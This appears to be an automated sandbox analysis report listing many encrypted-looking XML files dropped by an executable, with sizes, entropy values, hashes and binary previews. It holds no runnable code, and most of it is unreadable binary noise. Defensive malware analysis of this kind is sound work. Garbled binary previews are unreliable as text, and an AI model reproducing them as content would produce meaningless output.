7...8..H....q..M|...0..6!..\)T..1+'...)...n.mo..&~s..-.T.O...2.....Zc.\.w...I.....f...*[...3.1Q1....j.o.>mO;.>.X.oN.&.T.?y.....J<....2...`..m...2..H.g.d:.@1...B2...9......k.J...X..V..v.0_F.!................U%."..>..L.d.3qYw-.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):929
              Entropy (8bit):7.766250777956423
              Encrypted:false
              SSDEEP:12:cCcpYpNxklljmIBxn1NXfUSd1Y92kW/NzrjVe7M0yfjAnRKyABOFQMiwqJkVbdx6:VcpXll1n1NHvP3dP07MtLgR7kn8d+bD
              MD5:3032287F1CE3B1107002CBD0054B947B
              SHA1:FBF4AA90D727399810AD66CE514A89B33CFFEC0F
              SHA-256:55E174B09F0250E184FAE35FD02B9A220698F6F4CF8D3B44BA8D390BA663B9B4
              SHA-512:7D529265D7D1C24BD54070AC3FD1D19D522F9243677541F824C9536AC252CED7CB259B3B457D2F98608BF9E6557EFD0EF620569E2410ECB0464EB986329CBE04
              Malicious:false
              Preview:<?xml....esxg.+,...8.*......[$......G....M...Y.....>VW........1......../...~.............L.^.3...A.(....R. .X..r7....!..2..4Q...>....jt.=.k.n..@.z1M.9.[..v....1....d........n.....{T.Vq.#...H...q..W.6....p...'y%....I....Y.<.!i.....-....D.m.etc........o.....l..^.^~.r4..+...|d-.+<...;....7....E.....0...O.B.U...44..B.4xy.o.......Mh.....'.../.h.0$.K.......k..B....1g...f...-..5..K'..Kz.N}.GS....a:.....we.o=h7n..K...Ui.[r./.1...C\..'.li.....XE-7..H.J...Q.BX.:.;AD..cY3...j.K..~..0..B..0.T5..I=).A...2"..q9...y..:z?.G.....&..qb.QL..c0.).....d...$A..../.v..d0.`m.lj...#Tm..}....Vk...p..UU....,..}b.+A3.s.a..S.o.a.f..$C.2.U>x.{.e.0B2..}.....l.{I.._&{......@ml...N.fN...0E..a..'._)Y.P..f...z3/..B.ku.<.Z.|l.....W.a8%~.d.........d..f...`.$..K..x.2-...;.&...Q.....a.Rf..D= ...Q.A..@J@...4..........t0..70.Q.D...s^..N......P...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):722
              Entropy (8bit):7.699126564488837
              Encrypted:false
              SSDEEP:12:JfiWCTlOWd186gYML9dN7FqzV8CU5dK8JN5BXr8wCNHZAzrDYbZ1dxa3cii9a:JKWq7hKmLWK87r7AZAvDsZ1d+bD
              MD5:FFE2B69493F45ABF23BEC088DF4C5CED
              SHA1:C3E541A1227684E749849F89B3BEEA2D49A007B2
              SHA-256:A497D17DD23F8BEB599856AB98F18FEAA3ECBEAB0B44FD96AD0FFB8B623BAEBC
              SHA-512:A71CA3EDD680F9CB2055B33E95FB0DFEAD0121CC012729E3469296665C5A1F712A328C1FE9EA8923E57B1A706BE8E4FCE479B4B71E0541EE5ADB871CF710E57B
              Malicious:false
              Preview:<?xmlZ/.....A.W......~.....m.......dO'..........Y7 ..?....F...T.l.. ....i...9..4.._...[..K..J.T.e,..D........G..:...JF..w.S.}.....:...^...gN.M.;.A...k....h/.....NE.....a.Cz.n..sD"......f$.......{..T..j..|.i.....O....b.B..8u..x...$...v.D.........\.e.P.9.g..E:.#..s.....,.8y....;Yt.......bX.......Y.LM.1./F......u.....v;....df.B..BG.V..fWP...]..E.B\w...=G..........|W.e..]_...W.Q.&?.\..nc.p.v...(.......79....~..;.{...*r_#....]..-N&.BC..iT.]]._.o.^...LL..1.QN....z ..-...&....s..S.H....31.S.%7....?(..|.......Wof..a)_`V.....-.(....`L.M.>%[wk2|H..o.}H}:.......f...4.)V9.......B....<.....&...AmZ^q..&$..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):935
              Entropy (8bit):7.779825998550759
              Encrypted:false
              SSDEEP:24:WLtdW4IoP7WpNEc1m03kQ2Ro/Ss/Y/i4xYWCX7jkd+bD:WxP74yPCDAYFva8D
              MD5:37E378920B2AB31BFD954F818056BAA1
              SHA1:2162242759B69673D8F586B39CBC3777A14580EF
              SHA-256:D0C6587F3E0A58ED1997D5A9F72063E0AD4303AD0F4ED2A7D5DEE860A86FE041
              SHA-512:FF5E4405953E842F43384D335EAD90A110EDB3834F8AED4B4D2019EBC6C2DE03B9ED46CF760BABBCFD75A105F6F1776613E63E51E1272505EF7C8617E03B0AEB
              Malicious:false
              Preview:<?xml.kA"..-.?q.Tu...).J.....q.g.s.G.....?..b..K*L%6....u....3....J.. .z..-.."...k...E..;.[.s.)....Z32f..N~.O.-...........(...n........!.R)......^..$w/g4....L..6l.P.g.csl.....48..d".Y.m..z.<..* r%....t ..P.'.....H....., .;XP.?."...E...h...]kr.4F1..^r-...^.....LZ...........E.LD..YUq.......Y.......L.69.a.(}..]..F.4}....(...&><..(...h.Jay.6...^=..eU.;<.x..H.w../.....E.b......}..X..!S)#..W.kz...o.V..........cR.v......Y...|.yu...k.pw.....\.......t&..(Me.Q..T....n2R....<.P..........$....=.....k(....%.......WT...%.>.g.e..i.G.w=`../....S..R....L.....+;Gb.,pM@.B...v..-..E.d........1u..f.......}n..L.}(3a...b.T}..J.%......r...m....~]..-..m,.......m.e.6.......# 6.b^....T.bx.&.V.O...rrG..06.]~.7j..|5k22.=......4h.)..1S.6|..{C.o%...6.*.....-..w.....>..{..L.......w....,?.......D.O.].....L.ks.(#....&.....*..O..I.bg...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1357
              Entropy (8bit):7.841140900054718
              Encrypted:false
              SSDEEP:24:jA0BK1DJvRFgKuw8eY33l7Mz6/D2Pe+KJeZXth9tj6VOoiKeTG3D8KwSXLd+bD:jex7uNeaeNKJe7h8i3T9qXR8D
              MD5:E583EC5855B7790BF7DFE0F4D29A6B3C
              SHA1:C4406553A16743B92DB75CB45BAD62626DBB1D77
              SHA-256:02659DB6311575C935F1BB6CD4431815DA77DA88EC42CC181960645FB428D695
              SHA-512:352EAE1BF6CDDC921AB2A792CBCB619A81E76333603F2B44BE27D3571D22D7EB6C59D60B2FF28DAAE4511B515CE3F3AA4B18C5C750FC8E846909890917E15823
              Malicious:false
              Preview:<?xml.Eq..X.._}W....6.D....M.b.c0&..F...$nG......O...%.O........z..B0Oj..(>.}F).E ..:.u......B...C..5~X.{.K.qO..h._..X.g.?i.x...o..>..I..GW|n.!5...;..m.........bS:.+$....R.f.YBk[.UH$.?%.%.........e.md)......].'........a|...`dQ.^..X..N].H...J..6)>.l...'P....Oruy.c....a..1J..Bl..C.~...vs....$E^.......#.X.&4.......e..~:..`.l.x..Abu......!.a......GX.L.Y"..K.*..1.j.b*.....9.3^.}.3.r...~O;.U..4e.J....I.U.,..KR...A...&....X(..?.5S&..z.,.>.-...e.e.u?...q>R<`...'.qr.........B+...e:4!@}..P%(......^S..Mg.2t.&lOc5.ng..P.I..)..h.#.yz$.-....yY.x./.X|.ZG>..!a........#.xK8...m....B.....K5.C....9......Px45.9....p.Bn...x..cZO.T1Bh0.<O@..M.#.^..F.$XN..^.,.....X.\.aATRA|.E.c...Op[.i.'=.m..>R.Rw.L...j..%.r......}BY.>.=.....K*y.6I.T..m~..y.H........P....5...[.l$tV..g.{......w....21..X..v...<.......YKLYi..X6z.p..2u.D`........f..zU....E...r$..$..jj.....T@}0...h.E3'@J8yI........?6.<7l.U.g,..s.=....>?.._K~D..?...c._q....qG2h.iP..k+...$...B~...+V.!O..j*.gW..6....H
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1024
              Entropy (8bit):7.806353366980431
              Encrypted:false
              SSDEEP:24:5vh3aKXCvX9JqyI9oTLAQNYQFPJqbNd+bD:5J3Dg9Iy8CHP2n8D
              MD5:5A8D64161109F1626F84CF3B38E38D07
              SHA1:0301ED27B7ACD116FAC71EEBB95A8D54D7976BDD
              SHA-256:AFE2BF61BB4FF64482298A29CA18492C62D2B7BA3A628AE0CCF8A0B02C0790FC
              SHA-512:228E556E7FE0B9907535ACBE90825681B591BAEB8D61E1F848A143DFC1FC9C79975BDE5D1691E71F75E0F5CE2BB80939E3B60A7385D40EDC4F6043EC74DD4337
              Malicious:false
              Preview:<?xml..T.SR...3#..jk..1..2.yG.1.....Jb@.-.|......W].....!.9W$....gZ..%...R.w[l....o.#:.2..4AIK.38.].....!...;.jHg.S.#PhCRz....Y;C..&/..m.......D.G......o..s...".1..-....w[.!.".U.,!.$J.c..l.L.,..#.....$_h...}..j%H1.G.`.%.i/....c.0.....u~.......RU.b0<.._.7...!R.~. .TB...k....f.w--;.,.L.@$y|..=R.,./.%..........4.. >.'^O4.;d[.`.u...-...KR.o....B.QoD.=.A.fjO..7n......`.k .6..d..1.yG.V...!......}5..(..I.M.!.`q..M_....QX.Wj....t.+.C.....J..P.P..$..3.....a:,'..pY. .bU.d. .(8.{n .G.....}..{#.F-=.u....x..G#....gM...6..}.....fL.XR....?..2.y*.......n&X....B..lj........m#C..~....X.u*.G.|.5..i...|.,..i-v@YDP.:.n..........X..p:..................\...c1.B.... .....U...u..w..~..8Co....... ...).Y.vp..I..N.1M.x.,.QY.[...e..--%.N......o...E.<.G..45.....:..k....;!q..6p...."..........*..$._..7...?0..z.S.rne....*..............{>>...Ew....fl....X..l..!..p.F.......Q.t@;...G..$.o\"Y..<....J..c....N.Vx..k..O4h./...=.$gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):943
              Entropy (8bit):7.73274347936117
              Encrypted:false
              SSDEEP:24:An/+ppJWUTB8ODVYh0FCFcRGfbfFGUrP3OpdB0iM4Nrd+bD:AWp/WUJJ49F4+fF7z3Oh0iMmx8D
              MD5:DABEE6467FEC104F185B718AAC2ADF3A
              SHA1:66EBE8D27BB5C52CFD9CA49DF132B5BB631A1271
              SHA-256:0A5E2E137752FFF9AB08B9DD23A5F5C7AEC5C9D6559BF7564AA013349E291C97
              SHA-512:8EB714DB2FBEE683D21C9506D4A88405B5336F0A68F505B46488CCFC0DF02A777BAD6547D658A2F72CBF65F6F773563CE1A00F5101D71F82DC4C6B493F64C95C
              Malicious:false
              Preview:<?xml=1..(.n6..r....`.2Y5v..b.......^-Q.....p..U..@4....[.....J..61_U....7..H..U...<.x8.u..e.|F%5.,..Jb..46...`..k'Pb..X.....-7.l,L..4..4.....<E....DK...e@.).M...V.h.....g.@.e..U.Sm$V...........p......3.L.o..c.'...~..(L....H8dV@..S.V2D.'.~.....2G.....1.....VO...w.j.. .......1...u....o;C.U..!J...K.@}V).y.4O_.t...}......!....C.!....U.B...o.O........`:.x...a...~P.p.m.6....T.P.1...i....j.......6,.lG...KU...0...J..}E..u...I^h.m.V.!..u$..E...{lb> ..%E..y.e..R......]9.iR........t..q..p.8..p..t...y....`.cvQ...E...g.a.[....S.......n....w.#@..~..z..sn....pU,.).5..?..?...l...zSN...l.....>g..I..o..O....u,...2.......cu.r.)*...|..|7..Zw$...k..f.f.M~.}C|.u..4_..2..p%p.I...(....n....N.Y...6.q.....N.C6gg.8X..>I}.F. -....x....z-t.....+..dT.....2..."..}...g|;-.(......A...8%\{'..p.\w..B..2.ljs.f...C.J$......R....E..!]Lc..k...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):806
              Entropy (8bit):7.734721904233938
              Encrypted:false
              SSDEEP:24:Ied/sas5GhOhQHwgiR8/YpSZpYRON8kOJopCed+bD:5lsaKGQQHwgiRgNpYd2z8D
              MD5:7CE798F14B616A153E9889BD9217EA3D
              SHA1:FC33E60733F4BD0D388BBD09301B27803D3E7E54
              SHA-256:FF68258C0A655F02AB4310AE4EA827840787C4CAE26B95DF2C460177CE752CEB
              SHA-512:CBBAEF2B83826C49DE12690DB83816DE862AD250385E0A122D9AEFB8A7B1911873DB75C6C9B6B63A2248DBB59FEF8A337C66664097B297A100DB810A4A924D13
              Malicious:false
              Preview:<?xml5.....%.Al...c...>...-.......8J.Des./....._vv...r^..2^...c..[X%=?Jaa.v..?...Fs.....%/~.|.E|....../7..~...v4... p...3%.!?.)Y2.....b.......=."..S`&..#&W...[~...Zq.0,.'.l.f..:....#..#.L.E."xw..."...O....3...s...GE......V.....o....K2l.?A.hBc.....V@A.GX.+.TV1..`eYx~RR......".......F..#p.3....Q.....anx...H...&Y..7..Zg.(w.........j.j........,ybH?...:.Y{.A....S.F]..@.)..N.p...a....d..a.uGHbP?p*Z+.....%I.\.[9..w+...6...,...p_.....]%.PkdYu.U4.q+j..r@;.o...u.w.@sT..gu.....7.....k.......rN.....+@.G:P..E(^{..Q.vt...S.1.J..'.j...D.*G.s..._.=Y&f....V.J..i..nV.}T..)+...-.v<..ha.Q$].P.*..Y.$M.&...+q&$?.*w.#.n.q.O.+K..Y|.`#.....<X.G\....@..{H....: .....~M.|.}.EH..~.r@...#.*......5..Y.!..|...FY,......a.F8[gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1156
              Entropy (8bit):7.816635944978597
              Encrypted:false
              SSDEEP:24:LG6ERPz46FhQZ4zya1gE5Zwe05276V+QWVJ00iADO7niCC5ZWXLd+bD:LG6ZohQG++weq276YTVJ0RRiC0ZWh8D
              MD5:60631C207A9BD03A65BFC11195C8033C
              SHA1:238493B6435D8F2F65D07242FAE4759657160EAB
              SHA-256:DF1DD3B065238D4B4D455B824FAD6285631A1B933C93E17834CBF0CC708DF48A
              SHA-512:3978009D60E73F76790245A7C4FD6FF747CAD694D334F60FC8F22756B2ABC62C3DF6B8DD3F557B5B649B3E269BCE0DD687F7C6805DF016218E155C14516708C5
              Malicious:false
              Preview:<?xml\/..w..e7?.o8.f..k..g..2.!....`......*p6~.7.b..V....f_u2....G.}..T....p.*7..k.;.xa..|...g.....x.}.W../iskp$....!.1.`)..>L...p[4..v...X...<.j `."w{(.G.....T1,..Jr...E]....hR.*...K.)oEt.j.G.O=..6...b/..^.....d..........a.JR...F.?uM^q<..:.....h.P..o.....e..qUc.....J..uY..U.....bQO,`?.J`P...w5..,).^......[%....l.tU=Z..\n8..1I......^l.s;..3..F+.@.!.P'Wuw...{1.E......^_../...,....d.=l<eVt...M.T#.....)+.D...Z.....7...!.(...d.*....hp.s.[Z.$.D:A..Z_..I......1.....[&.M.o....,..A$K.J.N/...(...z..K........%.`.I.z.BF.x...T'k.....w..1kX5...C../ _1nua_.../....#v.U..B. 3..DN.'P,.......se.#....`&....w....E4.&.........d.~....g...s^&\......E.9...Zq...`s.....]..N.pz..s~.e5N.....L[X.......\.>m.Q}..=<^6...c.ep...Mb3...`.c..9..X9...m.....T...v.}Fh...S5i:.=....K9.]=I..+...b...?D...y..(.[+-....7..Sw...z'. K.....gAk.-[ZV.oD2....'........|.tw......W$.:.,...k.G.t..i|G.#....\-.t.H.4.>..\..9...............F%.E........o.]...K.sL>..ok...r..,.......iQ^.T..$+.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):927
              Entropy (8bit):7.729314501220281
              Encrypted:false
              SSDEEP:24:I7uvx0ooUO/93Z5EmJZPGpBW1XckXzd+bD:I7uNBDAZPVFZ8D
              MD5:A354711BE8A0450BC55C2F99F37BE048
              SHA1:0DD72E26CF3F90243660A8377DC162BFED12E080
              SHA-256:A78833E512CAC35D30D5E3632EF6F6F12B0C03DA8906F628105D87468AD5F885
              SHA-512:0C6ADA6FC763C4F4BA9BE1E10400E042D8FE504AFE214B3ECADA2523480DD5B9991A7DAAE6C31D53C34589738B93B18CFF4A7BE914A9DFD0248389BA4CD9C32C
              Malicious:false
              Preview:<?xml;/c.8..\V...-=>-)ht...U....R.."UN..d...6...nH..9....K..b...]....Z..,.r.R.!.*Vg8.H..M...>SEV!..OH.].._.....+"_.#....,...K.(....`.P...Lh.>....~...#c#:...>@1..Q..7x...]A.Qp.D........2...e'....S.n.J2....&.F.....@e..^n.E).b{.>..@...W ..l.z......>......4?uVC.4.S.n..r.z..5?/...}........)m.f#.K.}..x<..\...5I.,.2)...U.iJ5....t20gq[.0........uZ.}....,H.."yx..4G.....)&..d.....GNz....h.<D..$.l1.V.*Cx(NwH.B........".!...h.T~..W..7.. ..O.<.........<s.:...*.!...*.p.rAc..\..T...)....@....hq..:l..IZ.E.,'.........Y!..Pi.......]..s....k]^....u..#P....Z.ku..b..r'.L..v.r f..a.5."......%..Nh..Q-9E&|3.Y....0.P?m.o......kn.'.Z..ha..T..;R. C...zt.$ELC]....o....D....n.I3...2.t.|?.....3.........#.u.....E*..-.'..(.j..i.,'.Z.m-.^.&...o.x..$.....-8.8....$.R......<I.P.<.Z.G.7....h...qS...1....'.yc.o......?..V.....j2fS.')}mgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):717
              Entropy (8bit):7.711465129335053
              Encrypted:false
              SSDEEP:12:gDtQ3llq8GP0LzDO0cuBrS7hdmQ+ittlMIzK/u9it6RUFlh/aew9R4l97e/3X4qi:gDtQ3llPG8LzlcIrSFdzttlMn/vrFj/1
              MD5:A03129C3F2FACA24BD0FDF510569F537
              SHA1:F2CD62AF02423FFE3E55C4E693783024AE32925C
              SHA-256:C77B3333E782840530407FDA475136147D30C25A67E28C56282FB7DDDFDFA7FD
              SHA-512:BCB838C3C8CC137B14792C5DE13DE1CCC35B87CC8ABBB1DDB36C9D3BD6DC95B3B6CA9951C2B760921A13BE89CF1EB52BBBA809C49475335276560164719035C2
              Malicious:false
              Preview:<?xml]&..^..l...=.o.0...<..~....2i...$s....%RK..q.$I../.02.c..rd..=b.,..9j..R..>.`..S..R....9.uW...9..uy.......!._.2.~K"'.,...9.Ir......9y9..".9....@../.Um..i..4..`Q..F$..W..J..<.b.....nF;..x.w[@J..{....sI*.T..(.M._G....i....=5..z...... ...6...H62@+......./.).."(!.1.J..l......f..."....4..Tb...%.tD.q\..~.-...h.3....,..........Qx.........S...[...$......e:...I.c.Z..Q.0.E.f+Q..L...H...S.)k.j_H.........n...n....A(,..A....l..M........{......o.+....=.>{i...C......T.[..k.T..7...W..%ll<Cx.....?.-W.9...2....<..ta...:..... ..r.p>.i..<F..i.j4M..W.....].;.7...k....mG`..R5....e..Q&..B{.@L.9....@z..... .bGIq..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):942
              Entropy (8bit):7.764713735325506
              Encrypted:false
              SSDEEP:24:I9ZSWLNHDGXrM5H1IcahYpzO05K2MwIJ3BjoLMentrNRpCdd+bD:I9gWQuVIBhh05s9JxEQ83pC38D
              MD5:DD6CE72DD57A7975FAF702F11971361E
              SHA1:8F709437B5571CECDF7878D6F01B9AC176999388
              SHA-256:8D8F5740BFDE1CA2D10FCFBCCA7FCDFFD06AC7A4531515288BF7505621839E9A
              SHA-512:9186438EAB8460EBCFF2B3C3AF0B5FF47274A45715B0ED75782256F878C189AA1DA4818427B2A86AF3B722AD7531B42D19E8669352FC768D6077CA469276D238
              Malicious:false
              Preview:<?xml0...;...B.T...[....]`C.{,.b.x.<......1.c./..B.X>...u....j.-p.,d.P..%.(^n..G.zUwc...U.'..`\.$.........G.S...Xv..y.<..G.V....+.r.....x.&.5%..k=.d....+......E....e.oI.`.S.H...[.tT.J.~...b..........H.6.....r.m..5..1R..\k;.)....<6.`..^)~..G.m.7..)...n>N.. .W.N"......e......P.W.......f...A...nfD.....s..KX....S.....V..4..1D..v<U;&..jz.Be....D2.|..o..CFC;..;.*...I.J....?...e.)..[,N.`.U....8.P.~.oU]..~.v8./e...V.......@.....rb.D8K.....5.}.C{..k.Gs..b..b9T.....V.h<.$J...qO.....IzQX.s..>t8..V......*..l..E....[z...YN.:...........4$^5.l...7`.6;...|.c.2.x<^....P../..l.`.......B......}#...8!.P......(R..:.2h.....#.brw..*....ZF%..[.'.P{.d.*.v...<N....j...'...`z/.F2.y..b&..CQ..]..{...)........w.E.k..p+._....h..'71bee?n...}z.bQ..q9.....g.oKV.w...I./6..rh*.Y....9.v.q.pCw.o....2.Et..}.@.......8bf...HW...7.+....-y.}"Ta.%.....K.z...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):949
              Entropy (8bit):7.753470577958761
              Encrypted:false
              SSDEEP:24:8m+E7gJDrzKw6I7VbR7hbotIcXc7BNNd+bD:n1gJDPr6IxbTotIicvn8D
              MD5:3462D49E9B966D06006CB5B76BAF6FEF
              SHA1:3BB0A41D71B5849483DCC77EA77B400D29E257B9
              SHA-256:6BCFDB51349CE138510C7DFF03EDCBF6D300669FCE6C1EBB7715D7ADB16875BE
              SHA-512:232C993CCA7FCC01CF8239EE37943AE4674C8F149AB3D3675767EE0CEFFE60B8914E44129FF9783995BEC46B14DB92A5FB1088AF10A05369F839D46DE13239CE
              Malicious:false
              Preview:<?xml..:#.$4....?.#.2ZO..q..c`...I9(v.1..q...5.s.I$..d:Rk0.[.g..._...i..k....K.!..w.......{O.hI......oY.....X....N..b..!hUm1..g.....$4....99Eu.~p......".]..9.r.S..!.....n.N....vE.8.W..4.D.0.%......R...7...$S........v4.K......0Z..4%....F.zo.%*....W.x.0(....y......p.X....5|..j.M.5..-}$.)lA.W......W.$..-.9..3...@...d.K>..........~n(.b...."C.<.:OU.".HfT-..(O...~7`.....&..W9.4/..p>'U.8,.x.-.".uy......A.GP..ue.".|..L....%.R.o....'.8V...v..m9.cD..*5.7oK.z......M.jF...6N:qH{..&..F../..s..-..&i.~<.Yn........02..f7h.E..k.t..{5....b2...P..,.*........!..c.}S.:xe..I'd....R........-....a.;;.`a7h..`%...G'.@.<..(..ul.......B.....b.....g.~.G/|?`....d.....<(Y...J.+?.M...".."..2.4.j...u...M}p.4.......B.}"..Q.t..}.G.I<./$..O..k.iW..h[......._O.&l..#.....L.K~.!.7..K.*_F.'.RU...2([..J....plu d........%...cD.2..]d......jl1...B.k.|.(..xI..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):867
              Entropy (8bit):7.74647943009614
              Encrypted:false
              SSDEEP:24:72614JiWXLilgN+EROLg/JuN4zbLyd+bD:6tKK8MOLSw4zbY8D
              MD5:9D117ED85C25A08C1C15F1FE0D4E6D73
              SHA1:74E28D2C591DCA58742980F367C1D62D0306F104
              SHA-256:389242B202CBC50897FB546C251D85FB6F54A0EB545EE578A7A0180442A00A11
              SHA-512:D1EDFDB5E6F3BB884366527B284C129B5EDB2AA1CECC5DD80938A7BC730CE00F206AB7D4456F8A1844EE3769184FD35EE56942C7150E4418078B61C1739F3936
              Malicious:false
              Preview:<?xmlq...p"R:...Z.e...D.]."`..mc.A.....:.a{..ks^{1...X...0Dh,;..<...2...?... .d.v.`v.{.. ].......f..-.n... ......a..Vv.[..vY.O..j..MO&.)........7..u...ba.<..XL..Y.....5..m}X...R...[i.~..@...'6.~.G.."..@..%P..+c4..3TT1.....i'.a.Jb...........~x..Y.\.A...e.n*.`&..I..+.{..a..o....Z....6........6N*.z_.:..g.......%..U.}...&....$2?.....6.,.HJi...z%P.p..qc.J...],70..+'.}..T.......I.og...=.H?M {.R...`...G...'M...{'..c.g......G.i....X..<.z.<L.....+.rmk.....o.s.-_V....}......?.^...E.6..VZ...z....^W..O/..O...[.......@.,.~%..9........2....,..._.o..H.....,....|.K>B>....n..U.<..?...C..h.n....5N.n.F|1...h....=..|A..\..uc....[.w.A..\. ....KG....:.H.|x.,.....+....#...k.,.K.U"..I......).[.?.F.%.5..G....LP....el._......[...Z....q1H'9t..h.J.,.k9...,.@....F....gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):918
              Entropy (8bit):7.752246646920291
              Encrypted:false
              SSDEEP:24:wZ1NnLLjXfgDVZg7Pg6EzzX7II3cpmCukFAXR8tWhF53d+bD:wn10DVZg7hUX7IIspmCukFAXR8cF5t8D
              MD5:0B034E454F95BAE7E4CC5F5FDE6AA6E7
              SHA1:137DD3AECF9C6194F14995F95506E852B7A13A02
              SHA-256:D307AC97053C2F26B49BD898706A7FCC2E3C349B2788CC935B4236ACF78356A6
              SHA-512:C95172FF2771C4A98D0F28DD2C2311665954B79D985125E16E4C3122D9E3FB360B3ACB6B4ED01D3BF3E8824CB95C68D3588D45D75DB2CFA590E28DF5DEAE8FAB
              Malicious:false
              Preview:<?xml..._.....Q.Y..h"....l.....bWr.i.i.P.-.m'wZ.e..>..~..hF..............D~....;..a..u......x.....Gft........8qx...:.....T.lNp....]..N..5=.]....n..b....n.7m+..Fq...^`:.......+16R..2....y...u."..3D.....?vWOR...ydd.eX.}.dc....0u..;h......Q....}S.........O........8.E.2....gvk#._l.&...T+..{`.].... u..F..C..?.F~........@...R.:...:%G..*.....N....A.I_.E.c....zi.0..^..*i4f+#/*.E..N..56.....u.M...~..b.n]...'C6...(.0Es..^K}z6...t....[...8..!v.n.{..[.g...@.....sz.(...]{pIy.]...D.mq|.OM.p..y^mj<W..*.P."...N..E%P.R..R-$...r.Qq<.D..Y..A.......wv.eV.5.y..LIqU...z.M.Q..X..<.aB..t...Y..o...;.....:.s..:.....p.J.=nz..n.ut.*..[.#.....X...T.^...........*8.f......xo.!..L..........ZWa<....Qu|..m<..l..:."=*q.G".$"!.51.-.Y...).o.U.2..Z...VFOD.t!4...N*..[..{..$zm..6{..>.2.mQ..eF.Lj.S.1.%.%..ZL.....4..2.. ...PR...?...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):898
              Entropy (8bit):7.757909208632216
              Encrypted:false
              SSDEEP:24:6EjkoceSdIDYcHij0MBvzGgfx6RfqsCcH7pDLd+bD:oNLdQJij0MtzGgfnsCm8D
              MD5:63E9D7B4FC0C998E764F8D88E0C654A2
              SHA1:CE29CDB3B8D311C6F08F69431FFC834C6696D8A7
              SHA-256:3356865E6802079F86F1235CF74506A3C8CE6F6C9E2F077B19DDAB2FB54BDADF
              SHA-512:7404EFBE7E1AC08648398E6DB403894D551C884161A564E3BBA2F1083193639F858C23264C8C710C398FBEE7008767B5C2356A5DF4F37B077D2132301CD46CA2
              Malicious:false
              Preview:<?xmlp.f..9t...^..fY.3.X&..e..-..Yn.k*...A..).[.#..)H.....C..O.F..l.....t.9..Ts..&/.:S....u7.1.+../A..1....g.E...u...@.. .....^.%.`.7....{q.A8P5.p..M.....q.$"lT<L...2.~...5...B..._x..;..c....}%..Il{.............T.....\~H..X.....%.I..=.ho`..C.Z{......PU...h"'.H...3.x.,g.....?.L..,........8$..;.d...2..._wL~.....I.zs .|ra.r.n...->...GN.J1......#..,Lk.?..s....u:n..%.5.Z..jf...%N...r..@X.hHV..b...i...Q.....*4.......&....|.L......H.........b...>.....b~....-....pp.<'..t..r?b.....\U.......Y9>ub...3&...yrsY.....]..c0.......5%.'.Ey..Q..J.7*..8... q+^b...e<....b.P...5...~..}.&.lT.N...6=..c..].;c...c.. 7..l.m3.....Y....Ix..sVm..~.<L....J.]%.#;1...!.m.q.....(.6..yS..#...f@'.....4ET72......k.....lPg..-.....1...[/.6\..3u....."`.>...>.Sa.........g........V....Il..C....a.-G*..b/..L.NgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):798
              Entropy (8bit):7.733036809196946
              Encrypted:false
              SSDEEP:24:e7tR7uUesJL1mwEuvbRqKS+biz4S7WpnSd+bD:a0s51Kutw+bW7uU8D
              MD5:5332B5D6F0A762DED6322032C4B01925
              SHA1:27E702ED3316887310351B5B17B3143BD016AF20
              SHA-256:92F76254BBCB342D9BF3D0F486CC575D6E1DD233F209034322C34A8099553288
